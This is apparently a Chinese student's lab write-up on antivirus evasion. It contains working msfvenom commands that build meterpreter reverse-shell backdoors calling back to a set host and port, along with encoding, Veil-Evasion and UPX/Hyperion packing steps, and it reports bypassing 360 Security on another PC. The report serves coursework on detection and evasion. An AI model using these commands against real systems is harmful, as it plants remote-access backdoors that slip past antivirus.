• 网络对抗技术 20165220 Exp3 免杀原理与实践


    实验任务

    1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;

    2 通过组合应用各种技术实现恶意代码免杀(1分)
    (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

    3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

    基础问题回答

    (1)杀软是如何检测出恶意代码的?

    一种检测是检测特征码,就是检测该代码是否含有恶意代码都含有的一段代码,只要包含这段代码就被认定是恶意代码;
    还有一种是检测该代码执行时是否有异常的行为,比如打开异常端口、关闭防火墙等,若有这些异常行为,则认定为恶意代码。

    (2)免杀是做什么?

    免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

    (3)免杀的基本方法有哪些?

    有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法。

    实验过程

    正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

    使用msf编码器msfvenom生成后门程序

    实验二中生成过一个后门程序,gyh_backdoor.exe,把它放到virscan网站中扫描

    不加处理的恶意代码能被绝大多数杀毒软件识别。注意这里好像不能带有数字,那样没办法上传扫描!

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.24.134 LPORT=5220 -f exe > met-encoded10.exe指令进行十次编码

    将生成的后门程序使用virscan进行扫描

    多次编码对免杀并没有太大效果,依旧能被绝大多数杀毒软件检测出来。

    使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.24.134 LPORT=5220 x> 20165220_backdoor_java.jar指令,生成jar类型的后门程序。

    使用msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.24.134 lport=5220 x> 20165220_backdoor.apk指令,生成Android后门程序,此时其为安装包。

    使用veil指令,启用veil;

    用use evasion命令进入Evil-Evasion

    使用use c/meterpreter/rev_tcp.py指令,进入配置界面;

    使用set LHOST 192.168.24.134指令和set LPORT 5220指令,设置反弹连接IP和端口;

    输入generate指令,生成文件,再输入生成的playload的名字:playload5220

    并使用virscan进行扫描。

    还是一样的会被检查出来。

    使用加壳工具生成后门程序

    输入upx playload5220.exe -o playload5220_upx.exe指令,给生成的后门程序加壳;

    使用virscan进行扫描。

    进入目录/usr/share/windows-binaries/hyperion/中,输入wine hyperion.exe -v playload5220.exe playload5220_hyperion.exe指令,给生成的后门程序加壳;

    使用virscan进行扫描。

    使用shellcode编程生成后门程序

    输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.24.134 LPORT=5220 -f c指令,生成一段shellcode;

    创建20165220.c文件,在其中输入:

    输入i686-w64-mingw32-g++ 20165220.c -o 20165220.exe指令,编译运行;

    老规矩

    通过组合应用各种技术实现恶意代码免杀(1分)

    • 使用MSF meterpreter生成shellcode,对生成的文件使用UPX加壳处理,尝试实现免杀。

    • Windows上的杀毒软件为:360安全卫士 

    即实现免杀完成!!!

    用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)

    舍友主机360版本

    免杀成功

    回连成功!

    离实战还缺些什么技术或步骤?

    本次实验我们只是简单的对文件进行加壳隐藏特征码来免杀,但是现在的病毒库更新速度很快,应该学会结合多种技术来免杀,如结合加壳,更换编码,修改程序入口,隐藏恶意软件共有的行为等来进行免杀。

    我们仍然需要不断进步,现在只掌握了一点皮毛而已。

    实验遇到的问题及解决方法

    在安装veil evasion的时候展开包一直失败

    解决办法:输入代码

    mkdir -p ~/.cache/wine
    cd ~/.cache/wine 
    wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
    wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
    这个好像跟版本有关系,我的完美解决~

    开启杀软能绝对防止电脑中恶意代码吗?

    试验后肯定不行啊,制作shellcode、加壳等技术手段的综合,就可以达到免杀的目的,对于一些技术高超的人简直是轻而易举的

    实践总结与体会

    这次做完后表示再也不相信360这种的了,感觉很轻松就绕过了360的查杀,对于免杀真的有所了解跟体会,所以我们才要不断学习进步,才能越来越好吧~

    因此以后下载软件要尽量从正版源下载,减少被植入后门的几率。有机会再多多留意这方面的知识~

  • 相关阅读:
    PostgreSQL 学习之使用psycopg2 操作之数据库不存在才创建
    终于还是离开这家公司了
    【转载】看完这篇文章,我奶奶都懂了https的原理
    PostgreSQL 函数学习
    Python 工作中比较实用的一些第三方库
    Python 获取对象的属性和方法—dir 函数
    Python 学习之type 函数的用法
    python 异常处理的基本语法
    pdb调试程序
    随机设置爬虫头部headers 信息
  • 原文地址:https://www.cnblogs.com/brs6666/p/10631802.html
Copyright © 2020-2023  润新知